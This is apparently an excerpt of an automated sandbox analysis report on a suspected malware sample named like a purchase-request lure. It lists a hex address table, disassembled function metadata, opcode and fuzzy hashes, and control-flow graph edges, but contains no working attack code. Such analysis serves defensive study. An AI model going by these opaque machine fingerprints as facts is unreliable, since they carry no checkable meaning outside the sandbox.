                                                                                        0x0136517f
                                                                                        0x01365181
                                                                                        0x01365181
                                                                                        0x01365181
                                                                                        0x0136515f
                                                                                        0x0136515f
                                                                                        0x01365163
                                                                                        0x01365165
                                                                                        0x01365165
                                                                                        0x01365167
                                                                                        0x01365167
                                                                                        0x01365169
                                                                                        0x01365169
                                                                                        0x0136518b
                                                                                        0x0136516b
                                                                                        0x0136516b
                                                                                        0x0136516c
                                                                                        0x0136516c
                                                                                        0x0136516f
                                                                                        0x01365171
                                                                                        0x01365173
                                                                                        0x01365174
                                                                                        0x01365176
                                                                                        0x01365177
                                                                                        0x01365178
                                                                                        0x0136517a
                                                                                        0x0136517c
                                                                                        0x0136517e
                                                                                        0x00000000
                                                                                        0x0136517e
                                                                                        0x01365169
                                                                                        0x0136513b
                                                                                        0x0136513b
                                                                                        0x01365141
                                                                                        0x01365143
                                                                                        0x01365143
                                                                                        0x00000000
                                                                                        0x01365143
                                                                                        0x01365139
                                                                                        0x013650c8
                                                                                        0x013650c8
                                                                                        0x013650d2
                                                                                        0x013650d4
                                                                                        0x013650d6
                                                                                        0x013650d8
                                                                                        0x013650da
                                                                                        0x013650dc
                                                                                        0x013650dd
                                                                                        0x013650df
                                                                                        0x013650e4
                                                                                        0x013650e6
                                                                                        0x013650e8
                                                                                        0x013650eb
                                                                                        0x013650ed
                                                                                        0x013650ef
                                                                                        0x00000000
                                                                                        0x013650ef
                                                                                        0x013650c6
                                                                                        0x0136518c
                                                                                        0x0136518e
                                                                                        0x01365190
                                                                                        0x01365191
                                                                                        0x01365193
                                                                                        0x01365195
                                                                                        0x01365197
                                                                                        0x01365198
                                                                                        0x0136519d
                                                                                        0x013651a0
                                                                                        0x013651a1
                                                                                        0x013651a3
                                                                                        0x013651a5
                                                                                        0x013651a8
                                                                                        0x013651aa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x013651ac
                                                                                        0x013651ae
                                                                                        0x013651b0
                                                                                        0x013651b4
                                                                                        0x013651b4
                                                                                        0x013651b4
                                                                                        0x013651b6
                                                                                        0x013651b8
                                                                                        0x013651ba
                                                                                        0x013651bd
                                                                                        0x013651bf
                                                                                        0x013651c2
                                                                                        0x013651c4
                                                                                        0x013651c6
                                                                                        0x013651c8
                                                                                        0x00000000
                                                                                        0x013651ca
                                                                                        0x013651ca
                                                                                        0x013651cc
                                                                                        0x013651f6
                                                                                        0x013651f6
                                                                                        0x013651f8
                                                                                        0x013651fd
                                                                                        0x013651ff
                                                                                        0x01365202
                                                                                        0x00000000
                                                                                        0x013651ce
                                                                                        0x013651d0
                                                                                        0x013651d2
                                                                                        0x013651d6
                                                                                        0x013651d8
                                                                                        0x013651db
                                                                                        0x01365205
                                                                                        0x01365205
                                                                                        0x01365207
                                                                                        0x0136520c
                                                                                        0x0136520e
                                                                                        0x01365211
                                                                                        0x013651dd
                                                                                        0x013651df
                                                                                        0x013651e1
                                                                                        0x013651e8
                                                                                        0x013651ea
                                                                                        0x013651ee
                                                                                        0x013651f0
                                                                                        0x013651f3
                                                                                        0x013651f3
                                                                                        0x00000000
                                                                                        0x013651f3
                                                                                        0x013651ea
                                                                                        0x013651db
                                                                                        0x013651cc
                                                                                        0x013651c8
                                                                                        0x01365214
                                                                                        0x01365215
                                                                                        0x01365217
                                                                                        0x0136521d
                                                                                        0x0136521f
                                                                                        0x01365221
                                                                                        0x01365227
                                                                                        0x01365229
                                                                                        0x0136522b
                                                                                        0x0136522e
                                                                                        0x01365230
                                                                                        0x01365232
                                                                                        0x01365234
                                                                                        0x0136523a
                                                                                        0x0136523c
                                                                                        0x0136523f
                                                                                        0x0136523f
                                                                                        0x01365240
                                                                                        0x01365245
                                                                                        0x01365248
                                                                                        0x01365249
                                                                                        0x0136524a
                                                                                        0x0136524c
                                                                                        0x01365252
                                                                                        0x01365255
                                                                                        0x01365258
                                                                                        0x0136525a
                                                                                        0x0136525d
                                                                                        0x0136525f
                                                                                        0x01365262
                                                                                        0x01365265
                                                                                        0x01365267
                                                                                        0x01365269
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0136526b
                                                                                        0x0136526d
                                                                                        0x0136526f
                                                                                        0x0136526f
                                                                                        0x01365272
                                                                                        0x01365274
                                                                                        0x01365277
                                                                                        0x01365279
                                                                                        0x0136527c
                                                                                        0x0136527e
                                                                                        0x01365280
                                                                                        0x01365283
                                                                                        0x01365285
                                                                                        0x01365287
                                                                                        0x01365289
                                                                                        0x0136528c
                                                                                        0x0136528f
                                                                                        0x01365292
                                                                                        0x01365297
                                                                                        0x0136529c
                                                                                        0x0136529e
                                                                                        0x013652a0
                                                                                        0x013652a1
                                                                                        0x013652a4
                                                                                        0x013652a5
                                                                                        0x013652a7
                                                                                        0x013652a9
                                                                                        0x013652ac
                                                                                        0x013652b1
                                                                                        0x013652b1
                                                                                        0x013652b7
                                                                                        0x013652c1
                                                                                        0x013652c1
                                                                                        0x013652c4
                                                                                        0x013652c6
                                                                                        0x013652cc
                                                                                        0x013652ce
                                                                                        0x013652cf
                                                                                        0x013652d4
                                                                                        0x013652d6
                                                                                        0x013652d9
                                                                                        0x013652db
                                                                                        0x013652e1
                                                                                        0x013652e3
                                                                                        0x013652e4
                                                                                        0x013652b9
                                                                                        0x013652b9
                                                                                        0x013652bb
                                                                                        0x013652bd
                                                                                        0x013652bd
                                                                                        0x00000000
                                                                                        0x013652bd
                                                                                        0x013652bb
                                                                                        0x013652e5
                                                                                        0x013652e6
                                                                                        0x013652e8
                                                                                        0x013652ea
                                                                                        0x013652ed
                                                                                        0x013652ef
                                                                                        0x013652f1
                                                                                        0x013652f3
                                                                                        0x013652f5
                                                                                        0x013652f7
                                                                                        0x013652fa
                                                                                        0x013652fc
                                                                                        0x013652fe
                                                                                        0x01365300
                                                                                        0x01365302
                                                                                        0x01365304
                                                                                        0x01365309
                                                                                        0x0136530b
                                                                                        0x0136530d
                                                                                        0x0136530d
                                                                                        0x0136530f
                                                                                        0x01365311
                                                                                        0x01365313
                                                                                        0x01365318
                                                                                        0x0136531b
                                                                                        0x01365320
                                                                                        0x01365322
                                                                                        0x01365324
                                                                                        0x01365327
                                                                                        0x01365329
                                                                                        0x0136532b
                                                                                        0x0136532c
                                                                                        0x0136533c
                                                                                        0x0136533c
                                                                                        0x0136533e
                                                                                        0x01365342
                                                                                        0x01365344
                                                                                        0x01365345
                                                                                        0x00000000
                                                                                        0x01365347
                                                                                        0x01365347
                                                                                        0x01365349
                                                                                        0x00000000
                                                                                        0x0136534b
                                                                                        0x0136534b
                                                                                        0x00000000
                                                                                        0x0136534b
                                                                                        0x01365349
                                                                                        0x0136532e
                                                                                        0x0136532e
                                                                                        0x01365330
                                                                                        0x013653a1
                                                                                        0x013653a1
                                                                                        0x013653a3
                                                                                        0x013653a5
                                                                                        0x013653a6
                                                                                        0x013653a8
                                                                                        0x013653aa
                                                                                        0x013653ae
                                                                                        0x013653b0
                                                                                        0x013653b1
                                                                                        0x0136534d
                                                                                        0x0136534d
                                                                                        0x0136534f
                                                                                        0x01365351
                                                                                        0x01365352
                                                                                        0x01365353
                                                                                        0x01365355
                                                                                        0x01365357
                                                                                        0x01365358
                                                                                        0x0136535a
                                                                                        0x0136535c
                                                                                        0x01365360
                                                                                        0x01365362
                                                                                        0x01365366
                                                                                        0x01365368
                                                                                        0x01365368
                                                                                        0x0136536b
                                                                                        0x0136536b
                                                                                        0x00000000
                                                                                        0x0136536d
                                                                                        0x0136536d
                                                                                        0x0136536f
                                                                                        0x013653e0
                                                                                        0x013653e2
                                                                                        0x013653e5
                                                                                        0x013653e6
                                                                                        0x013653e8
                                                                                        0x00000000
                                                                                        0x013653ea
                                                                                        0x013653ea
                                                                                        0x013653ec
                                                                                        0x013653ee
                                                                                        0x013653f2
                                                                                        0x013653f2
                                                                                        0x013653f2
                                                                                        0x013653f3
                                                                                        0x0136541d
                                                                                        0x0136541f
                                                                                        0x00000000
                                                                                        0x013653f5
                                                                                        0x013653f5
                                                                                        0x013653f7
                                                                                        0x013653f9
                                                                                        0x013653fb
                                                                                        0x013653fe
                                                                                        0x013653ff
                                                                                        0x00000000
                                                                                        0x013653ff
                                                                                        0x013653f3
                                                                                        0x01365371
                                                                                        0x01365374
                                                                                        0x01365376
                                                                                        0x01365377
                                                                                        0x01365377
                                                                                        0x00000000
                                                                                        0x01365377
                                                                                        0x0136536f
                                                                                        0x013653b3
                                                                                        0x013653b3
                                                                                        0x013653b5
                                                                                        0x013653b7
                                                                                        0x013653ba
                                                                                        0x013653ba
                                                                                        0x013653bc
                                                                                        0x013653bd
                                                                                        0x013653bd
                                                                                        0x013653be
                                                                                        0x013653bf
                                                                                        0x013653c1
                                                                                        0x013653c3
                                                                                        0x013653c5
                                                                                        0x013653c7
                                                                                        0x013653c8
                                                                                        0x013653ca
                                                                                        0x013653cc
                                                                                        0x013653ce
                                                                                        0x013653d1
                                                                                        0x013653d1
                                                                                        0x013653d3
                                                                                        0x013653d5
                                                                                        0x013653d7
                                                                                        0x013653d9
                                                                                        0x01365379
                                                                                        0x01365379
                                                                                        0x0136537b
                                                                                        0x0136537d
                                                                                        0x01365380
                                                                                        0x01365382
                                                                                        0x01365383
                                                                                        0x01365385
                                                                                        0x01365387
                                                                                        0x0136538b
                                                                                        0x0136538d
                                                                                        0x0136538e
                                                                                        0x01365402
                                                                                        0x01365402
                                                                                        0x01365402
                                                                                        0x00000000
                                                                                        0x01365390
                                                                                        0x01365390
                                                                                        0x01365392
                                                                                        0x01365403
                                                                                        0x01365403
                                                                                        0x00000000
                                                                                        0x01365405
                                                                                        0x01365405
                                                                                        0x01365405
                                                                                        0x01365407
                                                                                        0x01365421
                                                                                        0x01365421
                                                                                        0x01365422
                                                                                        0x01365424
                                                                                        0x01365409
                                                                                        0x01365409
                                                                                        0x0136540b
                                                                                        0x0136540d
                                                                                        0x01365412
                                                                                        0x01365412
                                                                                        0x01365412
                                                                                        0x01365407
                                                                                        0x01365394
                                                                                        0x01365397
                                                                                        0x01365399
                                                                                        0x0136539a
                                                                                        0x0136539d
                                                                                        0x0136539f
                                                                                        0x0136539f
                                                                                        0x00000000
                                                                                        0x0136539f
                                                                                        0x01365392
                                                                                        0x013653db
                                                                                        0x013653db
                                                                                        0x013653dd
                                                                                        0x013653de
                                                                                        0x013653de
                                                                                        0x013653d9
                                                                                        0x013653b5
                                                                                        0x01365332
                                                                                        0x01365335
                                                                                        0x01365337
                                                                                        0x01365338
                                                                                        0x01365339
                                                                                        0x0136533a
                                                                                        0x00000000
                                                                                        0x0136533a
                                                                                        0x01365330
                                                                                        0x01365426

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266172780.0000000001302000.00000020.00000001.01000000.00000003.sdmp, Offset: 01300000, based on PE: true
                                                                                        • Associated: 00000000.00000002.266166374.0000000001300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.266387522.0000000001398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1300000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3c20f347b477a43bea4b8e349ebfbcdf0270bdb4bf2cbfa4000438bbeb941c1a
                                                                                        • Instruction ID: ab6af5c21c52b7d5d36a97ac49953c9838852f2f7283e4f1c55d9c0e23d5abec
                                                                                        • Opcode Fuzzy Hash: 3c20f347b477a43bea4b8e349ebfbcdf0270bdb4bf2cbfa4000438bbeb941c1a
                                                                                        • Instruction Fuzzy Hash: 9E13476240E3C29FC7138B749CB56D1BFB5AE5721871E89DBC4C0CF0A7E2185A5AC762
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01255E88 Relevance: .6, Instructions: 583COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.266086526.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1250000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 40070a42953ec054800fbd77f100607d58c9cb8c1ec324032a7c8c40d78a9da5
                                                                                        • Instruction ID: ded5e5308aba61a5c436e5df359be4ac638da40f033b24bf8e40a30a559b8f53
                                                                                        • Opcode Fuzzy Hash: 40070a42953ec054800fbd77f100607d58c9cb8c1ec324032a7c8c40d78a9da5
                                                                                        • Instruction Fuzzy Hash: 1E22F431604255CFCB15CF69C4809AEFBF2FF89300F49C5AAE9459B266DB34E945CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C22748 Relevance: .5, Instructions: 453COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aa1de2634f4546a35b92cded35524cb2530d7c43a78025dd5f5c8f4d4ba84210
                                                                                        • Instruction ID: b41d73bef38ca545bf827cf28cf1a72f4fa0e7e0d780c10ea80eb6b6fa122ce6
                                                                                        • Opcode Fuzzy Hash: aa1de2634f4546a35b92cded35524cb2530d7c43a78025dd5f5c8f4d4ba84210
                                                                                        • Instruction Fuzzy Hash: C9025D35A00125EFDB18DF69E488A6DB7B2FF88710B168169E816DBB71DB30ED41CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C2F998 Relevance: .4, Instructions: 419COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c351b5e7be47cb213ec11e3874e65194a35ba277d3304266ab3401b5c2ff3425
                                                                                        • Instruction ID: 79c04234e73d594920e8248e11b092ef00b0d36f6a0456998a3a163e35f69008
                                                                                        • Opcode Fuzzy Hash: c351b5e7be47cb213ec11e3874e65194a35ba277d3304266ab3401b5c2ff3425
                                                                                        • Instruction Fuzzy Hash: F9E18332E14A1ACBCB12CF65C8005EEB3F2AF8E701B364569D5517B610D7B1AE87CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C29F80 Relevance: .4, Instructions: 380COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265906681.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c20000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 47fc008535e8b07c65f758ad4b9f09fcadc94705cd3234579710af18ffcdd781
                                                                                        • Instruction ID: d7d5a18bf9921dd62a9d71e6967db57e3d0e4f04d8616fce406254a8c765e130
                                                                                        • Opcode Fuzzy Hash: 47fc008535e8b07c65f758ad4b9f09fcadc94705cd3234579710af18ffcdd781
                                                                                        • Instruction Fuzzy Hash: 86D10531A04625CFCB14CFA9E980AAEB7F2EF84310F158469E509DBB62D771ED41CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:11%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:17
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 38418 1860471 38419 1860480 38418->38419 38423 18604c8 38419->38423 38428 18604d8 38419->38428 38420 1860489 38424 18604fa 38423->38424 38433 18608e0 38424->38433 38437 18608e8 38424->38437 38425 186053e 38425->38420 38429 18604fa 38428->38429 38430 18608e0 GetConsoleWindow 38429->38430 38431 18608e8 GetConsoleWindow 38429->38431 38432 186053e 38430->38432 38431->38432 38432->38420 38435 18608e6 GetConsoleWindow 38433->38435 38436 1860956 38435->38436 38436->38425 38438 18608e9 GetConsoleWindow 38437->38438 38440 1860956 38438->38440 38440->38425

                                                                                        Executed Functions

                                                                                        Function 057268F8 Relevance: 1.2, Instructions: 1232COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a3c7a342c8b86f5a54b30a81b192fe534fded5d64d10b438c1a7199f6f20d0b
                                                                                        • Instruction ID: 425351c9db73cddbed2027d4a97677a9d141bce3346d2c5d413014593ef15cc1
                                                                                        • Opcode Fuzzy Hash: 6a3c7a342c8b86f5a54b30a81b192fe534fded5d64d10b438c1a7199f6f20d0b
                                                                                        • Instruction Fuzzy Hash: 3592E030B052159FCF24ABB498A467E76B3FFC9600B24842EE906DB394DF74DC46A791
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572BE80 Relevance: .6, Instructions: 604COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1832 572be80-572be8d 1834 572bef1-572befa 1832->1834 1835 572be8f-572be99 1832->1835 1836 572bf04-572bf1f 1834->1836 1837 572befc-572bf02 1834->1837 1838 572beab-572beb5 1835->1838 1839 572be9b-572bea3 1835->1839 1846 572bf26-572bf30 1836->1846 1837->1836 1843 572bebd-572bee9 1838->1843 1839->1838 1843->1846 1855 572beeb-572bef0 1843->1855 1848 572bf32-572bf38 1846->1848 1849 572bf3b-572bfd2 1846->1849 1848->1849 1865 572bfd4 1849->1865 1866 572bfd9-572bfed 1849->1866 1865->1866 1867 572c025-572c036 1866->1867 1869 572c038-572c03c 1867->1869 1870 572bfef-572c013 call 5722a98 1867->1870 1871 572c079-572c080 1869->1871 1872 572c03e-572c071 call 5729a38 call 5729a98 call 572a298 1869->1872 1879 572c024 1870->1879 1880 572c015-572c019 1870->1880 1886 572c083-572c08d 1872->1886 1887 572c073-572c077 1872->1887 1879->1867 1880->1879 1882 572c01b-572c022 1880->1882 1882->1869 1888 572c098-572c122 call 5729c18 1886->1888 1889 572c08f-572c095 1886->1889 1887->1871 1887->1886 1904 572c124-572c128 1888->1904 1905 572c129-572c16c call 5729a38 call 5729a98 call 572a298 1888->1905 1889->1888 1904->1905 1913 572c1e1-572c1e6 1905->1913 1914 572c16e-572c170 1905->1914 1915 572c1ce-572c1df 1914->1915 1915->1913 1917 572c172-572c196 1915->1917 1920 572c198-572c1ab call 5722a98 1917->1920 1921 572c1cd 1917->1921 1924 572c1b2 1920->1924 1925 572c1ad-572c1b0 1920->1925 1921->1915 1926 572c1b4-572c1b7 1924->1926 1925->1926 1927 572c1c4 1926->1927 1928 572c1b9-572c1c2 1926->1928 1929 572c1c9-572c1cb 1927->1929 1928->1929 1929->1921 1930 572c1e7-572c1f0 1929->1930 1931 572c1f2-572c1f8 1930->1931 1932 572c1fa-572c216 1930->1932 1931->1932 1935 572c228-572c23c 1932->1935 1936 572c218-572c220 1932->1936 1939 572c24e-572c2f7 call 572a298 1935->1939 1940 572c23e-572c246 1935->1940 1936->1935 1954 572c30b-572c30f 1939->1954 1955 572c2f9-572c309 call 572a298 1939->1955 1940->1939 1955->1954 1958 572c310-572c319 1955->1958 1959 572c323-572c39a 1958->1959 1960 572c31b-572c321 1958->1960 1971 572c3a1-572c3a2 1959->1971 1972 572c39c-572c3a0 1959->1972 1960->1959 1973 572c3a4-572c3a5 1971->1973 1974 572c3a9-572c3bb 1971->1974 1972->1971 1973->1974 1976 572c40b-572c410 1974->1976 1977 572c3bd-572c3c1 1974->1977 1978 572c3c3-572c3de 1977->1978 1979 572c3e6-572c3f9 call 5722a98 1977->1979 1978->1979 1979->1976 1983 572c3fb-572c3ff 1979->1983 1985 572c411-572c41b 1983->1985 1986 572c401-572c405 1983->1986 1987 572c426-572c492 1985->1987 1988 572c41d-572c423 1985->1988 1986->1976 1989 572c499-572c4a3 1986->1989 1987->1989 1988->1987 1990 572c4a5-572c4ab 1989->1990 1991 572c4ae-572c541 1989->1991 1990->1991 2011 572c579-572c58a 1991->2011 2013 572c543-572c567 call 5722a98 2011->2013 2014 572c58c-572c591 2011->2014 2018 572c578 2013->2018 2019 572c569-572c56d 2013->2019 2018->2011 2019->2018 2020 572c56f-572c577 2019->2020
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 77d4c9a96724b5c8090e1bcf18976b37254d72a83d135aebfe87e2c1f7e62308
                                                                                        • Instruction ID: fd9d3c391162ce7485c57786e405091106e9b8481423034268b0f45455614b1e
                                                                                        • Opcode Fuzzy Hash: 77d4c9a96724b5c8090e1bcf18976b37254d72a83d135aebfe87e2c1f7e62308
                                                                                        • Instruction Fuzzy Hash: C9220070704250AFC725EB35D859A6EBBE7EF85210F15886AE806CB391DF30EC45DB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 057221D8 Relevance: .4, Instructions: 367COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2a33934c4149935802388efeea16dd40ec0441eedb90c023436e2b36f94212bd
                                                                                        • Instruction ID: ddc9c18be9763a0f6f2093e7d66a3af42379de7b2c850113f760e2c4f708dff2
                                                                                        • Opcode Fuzzy Hash: 2a33934c4149935802388efeea16dd40ec0441eedb90c023436e2b36f94212bd
                                                                                        • Instruction Fuzzy Hash: C1D1BD39B042049FCB05DFB5C854ABABBB6FF89214B1580A9E905DB362DF35DC42DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05721D98 Relevance: .3, Instructions: 339COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f695a068f97c5d37acec329af84253a4f9bce12bf52c3c888855fe8621a7ff87
                                                                                        • Instruction ID: 675dfc42ca06fe2e045e7efc4f58acf7d77d78cd2627ee4b947c1f8186ed8868
                                                                                        • Opcode Fuzzy Hash: f695a068f97c5d37acec329af84253a4f9bce12bf52c3c888855fe8621a7ff87
                                                                                        • Instruction Fuzzy Hash: 16D15874B012159FCB14DF69D584AADB7F3FF88210B648469E806DB361DB31ED42DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 018608E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 18608e0-18608e4 1 18608e6 0->1 2 186093d-1860954 GetConsoleWindow 0->2 3 18608e8 1->3 4 18608e9-186093c 1->4 7 1860956-186095c 2->7 8 186095d-1860982 2->8 3->4 4->2 7->8
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.362227071.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1860000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWindow
                                                                                        • String ID: :|v&
                                                                                        • API String ID: 2863861424-1213271392
                                                                                        • Opcode ID: 5c7792c01584a66cf961cb5b766d6b241f0e210a30e47d90ed877b3698e5e21d
                                                                                        • Instruction ID: 19c6331de34139568d8daf34f754f9113e93301657d379d43e3c5ab4ffd16ac9
                                                                                        • Opcode Fuzzy Hash: 5c7792c01584a66cf961cb5b766d6b241f0e210a30e47d90ed877b3698e5e21d
                                                                                        • Instruction Fuzzy Hash: C21149759003098FDB14DFAAC8447DFBBF9EB48328F208419E529A7240CB386545CBE5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 018608E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 13 18608e8-1860954 GetConsoleWindow 19 1860956-186095c 13->19 20 186095d-1860982 13->20 19->20
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.362227071.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1860000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWindow
                                                                                        • String ID: :|v&
                                                                                        • API String ID: 2863861424-1213271392
                                                                                        • Opcode ID: 626f1e80ca85ed525517b84757752f31dcfd7d859a62197c8d36bbe21db882c8
                                                                                        • Instruction ID: 60ff084e38b7b0a91b8d352512e247a179bfb600f0b1bf828d33a6859a16c6f6
                                                                                        • Opcode Fuzzy Hash: 626f1e80ca85ed525517b84757752f31dcfd7d859a62197c8d36bbe21db882c8
                                                                                        • Instruction Fuzzy Hash: FE113A719043098FDB14DFAAC8447DFBBF5EB48228F208419E515A7240C7386544CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05728170 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 838 5728170-572818e 841 5728195-5728197 838->841 842 5728199-572819e 841->842 843 572819f-57281ad 841->843 845 57281b5-57281ba 843->845 846 57281af-57281b4 843->846 847 57281c2-57281c5 845->847 848 57281bc-57281c1 845->848 849 57281c7-57281ca 847->849 850 57281ff-5728208 847->850 851 57281cc-57281d1 849->851 852 57281dd-57281e2 849->852 853 5728212-57282a1 850->853 854 572820a-5728210 850->854 851->852 855 57281d3-57281d7 851->855 856 57281e4-57281ea 852->856 857 57281f9-57281fe 852->857 859 57282a8-57282b2 853->859 854->853 855->852 855->859 860 5728352-572835c 856->860 861 57281f0-57281f3 856->861 863 57282b4-57282ba 859->863 864 57282bd-572834b 859->864 865 5728367-572840a 860->865 866 572835e-5728364 860->866 861->857 861->860 863->864 864->860 899 5728411-5728413 865->899 900 572840c-572840e 865->900 866->865 902 5728415-572847f 899->902 901 5728410 900->901 900->902 901->899
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.367097697.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_5720000_RFQ - FYKS - 06052022.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: {k^h^
                                                                                        • API String ID: 0-1783359612
                                                                                        • Opcode ID: ce4475c8614b06f9d836c7b1b8e5934e601f04ab01b1973bb694c8fad3232f15
                                                                                        • Instruction ID: 4e974e184c753d2a299c8cf00916ed49b32dceeda11af2f4169c6d174454e496
                                                                                        • Opcode Fuzzy Hash: ce4475c8614b06f9d836c7b1b8e5934e601f04ab01b1973bb694c8fad3232f15
                                                                                        • Instruction Fuzzy Hash: CC81F230B052199FCB24EFB9D4556AEB7B2FF85204F60846DE505EB384DF31AD428B92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0572A370 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
